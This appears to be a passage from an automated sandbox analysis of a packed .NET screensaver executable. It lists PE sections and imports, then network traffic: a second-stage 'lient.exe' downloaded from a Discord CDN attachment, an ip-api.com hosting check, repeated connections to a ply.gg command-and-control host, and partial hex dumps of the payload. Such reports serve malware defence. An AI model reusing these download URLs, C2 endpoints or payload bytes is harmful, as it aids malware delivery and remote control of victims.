                      fiadd dword ptr [eax]
                      add byte ptr [edx], cl
                      sub eax, 0000DB99h

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x336300x28.vmp1
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x740000xf94.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x760000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x340000x8.vmp1
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x664800x48.vmp1
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x50c40x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .vmp00x80000x27b020x0False0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .vmp10x300000x43d080x43e00False0.7416335750460405data7.2244685170682175IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x740000xf940x1000False0.4501953125data4.622068540033343IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x760000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0x741300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.43727436823104693
                      RT_GROUP_ICON0x749d80x14data1.1
                      RT_VERSION0x749ec0x3bcdata0.4801255230125523
                      RT_MANIFEST0x74da80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 24, 2023 09:28:51.835947990 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:51.938301086 CEST8049713162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:51.938411951 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:51.939522982 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.042155027 CEST8049713162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.062495947 CEST8049713162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.067778111 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.067821026 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.067989111 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.076260090 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.076281071 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.108514071 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.303442001 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.303561926 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.309819937 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.309829950 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.310295105 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.358546972 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.399095058 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.442456007 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.650824070 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.650928974 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.650975943 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651016951 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651041985 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651088953 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651089907 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651101112 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651154995 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651161909 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651206970 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651246071 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651247025 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651258945 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651293993 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651300907 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651629925 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651678085 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651688099 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651892900 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.651931047 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.651937962 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652122021 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652159929 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.652165890 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652647018 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652693987 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.652700901 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652816057 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.652853966 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.652858973 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653076887 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653117895 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.653124094 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653763056 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653810024 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653819084 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.653826952 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.653867960 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.653896093 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654124022 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654165030 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.654170036 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654787064 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654839039 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.654844046 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654931068 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.654973030 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.654978037 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655052900 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655093908 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.655100107 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655302048 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655348063 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.655352116 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655363083 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.655421019 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.655431986 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656124115 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656176090 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.656182051 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656369925 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656421900 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.656428099 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656471968 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.755404949 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.755494118 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.755795002 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.755848885 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756023884 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756071091 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756258011 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756306887 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756536007 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756587029 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.757507086 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.757564068 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.757858992 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.757911921 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758135080 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758184910 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758348942 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758414984 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758723021 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758776903 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758831978 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758878946 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759299994 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759349108 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759607077 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759658098 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759820938 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759871006 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759875059 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759888887 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759912014 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759973049 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.760014057 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.764522076 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:55.168826103 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.287955999 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:28:55.288300037 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.289849043 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:55.394612074 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:28:55.436570883 CEST4971580192.168.2.5208.95.112.1
                      Oct 24, 2023 09:28:58.037697077 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:28:59.030519962 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:01.030359983 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:05.030512094 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:13.030313969 CEST4971654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:20.267267942 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:21.280319929 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:23.280317068 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:27.191884041 CEST8049715208.95.112.1192.168.2.5
                      Oct 24, 2023 09:29:27.280306101 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:35.280266047 CEST4972154323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:42.346967936 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:43.358426094 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:45.358378887 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:49.358347893 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:29:57.358325005 CEST4972254323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:05.079020977 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:06.092757940 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:06.175199032 CEST4971380192.168.2.5162.159.135.233
                      Oct 24, 2023 09:30:08.108326912 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:12.108431101 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:20.108508110 CEST4972654323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:29.752381086 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:30.764525890 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:32.780175924 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:36.780168056 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:44.780251026 CEST4972854323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:54.393327951 CEST4972954323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:55.405215979 CEST4972954323192.168.2.5209.25.140.229
                      Oct 24, 2023 09:30:57.405242920 CEST4972954323192.168.2.5209.25.140.229

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 24, 2023 09:28:51.724133968 CEST5064853192.168.2.51.1.1.1
                      Oct 24, 2023 09:28:51.827795982 CEST53506481.1.1.1192.168.2.5
                      Oct 24, 2023 09:28:55.054267883 CEST6470253192.168.2.51.1.1.1
                      Oct 24, 2023 09:28:55.159499884 CEST53647021.1.1.1192.168.2.5
                      Oct 24, 2023 09:28:57.858885050 CEST6416853192.168.2.51.1.1.1
                      Oct 24, 2023 09:28:58.034796953 CEST53641681.1.1.1192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 24, 2023 09:28:51.724133968 CEST192.168.2.51.1.1.10xa174Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:55.054267883 CEST192.168.2.51.1.1.10xb92Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:57.858885050 CEST192.168.2.51.1.1.10xf841Standard query (0)ideas-teams.at.ply.ggA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 24, 2023 09:28:51.827795982 CEST1.1.1.1192.168.2.50xa174No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:51.827795982 CEST1.1.1.1192.168.2.50xa174No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:51.827795982 CEST1.1.1.1192.168.2.50xa174No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:51.827795982 CEST1.1.1.1192.168.2.50xa174No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:51.827795982 CEST1.1.1.1192.168.2.50xa174No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:55.159499884 CEST1.1.1.1192.168.2.50xb92No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                      Oct 24, 2023 09:28:58.034796953 CEST1.1.1.1192.168.2.50xf841No error (0)ideas-teams.at.ply.gg209.25.140.229A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • cdn.discordapp.com
                      • ip-api.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549714162.159.135.233443C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      TimestampkBytes transferredDirectionData


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.549713162.159.135.23380C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      TimestampkBytes transferredDirectionData
                      Oct 24, 2023 09:28:51.939522982 CEST0OUTGET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1
                      Host: cdn.discordapp.com
                      Connection: Keep-Alive
                      Oct 24, 2023 09:28:52.062495947 CEST2INHTTP/1.1 301 Moved Permanently
                      Date: Tue, 24 Oct 2023 07:28:51 GMT
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Tue, 24 Oct 2023 08:28:51 GMT
                      Location: https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                      Set-Cookie: __cf_bm=0jpx_3oF9ribyqwWLndqsJX24h1ICfR2EkRkwoK27eA-1698132531-0-Af77efxPsXVThM7VLz9J0d1R8MIB7cwDMUV72ZtK98hDwzC5BdG8pVHQGEu5oXM+ZdALNnv5P5qSZ13ZNLXNCus=; path=/; expires=Tue, 24-Oct-23 07:58:51 GMT; domain=.discordapp.com; HttpOnly
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5fQAlJnhEiK74y%2FbIsh%2Boinhy1KAGT%2FBZOywQBR3y801PlA2CfG1Y8njL8m8vcY4zWnH9XoQ4qqpllED0JKgmMMwVsN6xji1yGb4uo8kazxf0rc5SFjsEGl32%2B00iT1uGYHypA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Set-Cookie: _cfuvid=UF3BvbLAKH7ZKhiTe9FisHyzhNI9a9Quly0.L4G9frY-1698132531989-0-604800000; path=/; domain=.discordapp.com; HttpOnly
                      Server: cloudflare
                      CF-RAY: 81b08164ddf92040-IAD
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      2192.168.2.549715208.95.112.180C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      TimestampkBytes transferredDirectionData
                      Oct 24, 2023 09:28:55.289849043 CEST129OUTGET /line/?fields=hosting HTTP/1.1
                      Host: ip-api.com
                      Connection: Keep-Alive
                      Oct 24, 2023 09:28:55.394612074 CEST129INHTTP/1.1 200 OK
                      Date: Tue, 24 Oct 2023 07:28:55 GMT
                      Content-Type: text/plain; charset=utf-8
                      Content-Length: 6
                      Access-Control-Allow-Origin: *
                      X-Ttl: 60
                      X-Rl: 44
                      Data Raw: 66 61 6c 73 65 0a
                      Data Ascii: false


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549714162.159.135.233443C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      TimestampkBytes transferredDirectionData
                      2023-10-24 07:28:52 UTC0OUTGET /attachments/1161633037004587060/1161731056462995496/lient.exe HTTP/1.1
                      Host: cdn.discordapp.com
                      Connection: Keep-Alive
                      2023-10-24 07:28:52 UTC0INHTTP/1.1 200 OK
                      Date: Tue, 24 Oct 2023 07:28:52 GMT
                      Content-Type: application/x-msdos-program
                      Content-Length: 116224
                      Connection: close
                      CF-Ray: 81b08167fc140849-IAD
                      CF-Cache-Status: MISS
                      Accept-Ranges: bytes
                      Cache-Control: public, max-age=31536000
                      Content-Disposition: attachment; filename="lient.exe"
                      ETag: "2f621d531b27ff6bcf35db5412a879bf"
                      Expires: Wed, 23 Oct 2024 07:28:52 GMT
                      Last-Modified: Wed, 11 Oct 2023 18:24:27 GMT
                      Vary: Accept-Encoding
                      Alt-Svc: h3=":443"; ma=86400
                      x-goog-generation: 1697048667865086
                      x-goog-hash: crc32c=QIBeMw==
                      x-goog-hash: md5=L2IdUxsn/2vPNdtUEqh5vw==
                      x-goog-metageneration: 1
                      x-goog-storage-class: STANDARD
                      x-goog-stored-content-encoding: identity
                      x-goog-stored-content-length: 116224
                      X-GUploader-UploadID: ABPtcPqqrM6GeKkVDcoFtyR3AN5QvzL9jxJOpzINHVDmpbf_lNTAViQL4C98Jew0R9vLU4PM5Gu6SN3bzkxH2BsDwpxKhUHufQ8z
                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                      Set-Cookie: __cf_bm=dHef9XGlLGokpPodMVTMT4szmLvfGgjq_Psl9lbx4b8-1698132532-0-AVPbzLHxFvZT3pHzjY7dwiVdt1XlPY1kjBSFHxpArouI74PEVOu1hIw23OtWi0A1nDoRLGApculPlY63r9tVWOo=; path=/; expires=Tue, 24-Oct-23 07:58:52 GMT; domain=.discordapp.com; HttpOnly; Secure
                      2023-10-24 07:28:52 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 37 6f 56 52 72 4a 58 44 49 39 65 78 47 49 57 49 33 73 34 67 46 41 7a 76 4c 61 43 69 76 65 56 25 32 42 50 25 32 46 46 78 59 25 32 46 25 32 46 39 51 4a 59 4b 62 72 34 6f 44 68 77 31 44 59 7a 41 32 65 4d 4e 63 75 5a 69 42 57 74 59 6c 44 6f 47 5a 59 6a 6e 6b 46 41 4b 49 38 35 46 6d 4e 65 75 76 4b 62 58 41 67 73 6a 34 57 68 57 61 73 37 34 39 73 65 63 75 79 35 4d 32 79 41 4b 76 42 52 58 4b 59 61 4a 6d 39 48 53 35 61 41 54 39 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7oVRrJXDI9exGIWI3s4gFAzvLaCiveV%2BP%2FFxY%2F%2F9QJYKbr4oDhw1DYzA2eMNcuZiBWtYlDoGZYjnkFAKI85FmNeuvKbXAgsj4WhWas749secuy5M2yAKvBRXKYaJm9HS5aAT9Q%3D%3D"}],"group":"cf-nel","max_age
                      2023-10-24 07:28:52 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 8c 26 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ba 01 00 00 0a 00 00 00 00 00 00 3e d9 01 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 02 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELF&e> @
                      2023-10-24 07:28:52 UTC2INData Raw: 00 0e 00 00 00 04 00 00 11 7e 13 00 00 04 6f 15 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 0e 00 00 00 05 00 00 11 7e 14 00 00 04 6f 16 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 0e 00 00 00 06 00 00 11 7e 15 00 00 04 6f 17 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 0e 00 00 00 07 00 00 11 7e 16 00 00 04 6f 18 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 1f 00 00 00 08 00 00 11 7e 1d 00 00 0a 8c 06 00 00 1b 2d 0a 28 01 00 00 2b 80 1d 00 00 0a 7e 1d 00 00 0a 0a 00 06 2a 00 1e 02 28 1f 00 00 0a 2a 13 30 02 00 10 00 00 00 09 00 00 11 02 03 28 21 00 00 0a 28 22 00 00 0a 0a 00 06 2a 13 30 01 00 0a 00 00 00 0a 00 00 11 02 28 23 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 0e 00 00 00 0b 00 00 11 d0 07 00 00 02 28 24 00 00 0a 0a 00 06 2a 00 00 13 30 01 00 0a 00 00 00 0c 00 00 11 02 28
                      Data Ascii: ~o*0~o*0~o*0~o*0~-(+~*(*0(!("*0(#*0($*0(
                      2023-10-24 07:28:52 UTC4INData Raw: 00 00 01 20 a5 74 00 00 58 00 00 7e 27 00 00 0a 8e 20 84 00 00 00 58 28 03 00 00 06 28 1f 00 00 06 28 21 00 00 0a 28 21 00 00 0a 0a 00 06 2a 00 13 30 05 00 c5 00 00 00 14 00 00 11 02 28 3e 00 00 0a 6f 3f 00 00 0a 0d 16 14 80 01 00 00 04 13 04 38 9c 00 00 00 09 11 04 9a 13 05 11 05 6f 40 00 00 0a 13 06 16 14 80 04 00 00 04 0c 2b 76 11 06 08 9a 0a 06 6f 41 00 00 0a 7e 27 00 00 0a 8e 20 62 9d 00 00 58 7e 27 00 00 0a 8e 20 5c a0 00 00 58 7e 27 00 00 0a 8e 20 9f 00 00 00 58 28 03 00 00 06 03 28 42 00 00 0a 6f 43 00 00 0a 2c 27 11 05 6f 44 00 00 0a 08 80 0f 00 00 04 06 11 04 8c 1f 00 00 01 80 12 00 00 04 6f 41 00 00 0a 6f 45 00 00 0a 0b 2b 28 08 20 de 9a 05 7d 80 10 00 00 04 17 d6 0c 08 11 06 8e b7 32 83 11 04 17 d6 13 04 11 04 09 8e b7 3f 5a ff ff ff 14 0b 00
                      Data Ascii: tX~' X(((!(!*0(>o?8o@+voA~' bX~' \X~' X((BoC,'oDoAoE+( }2?Z
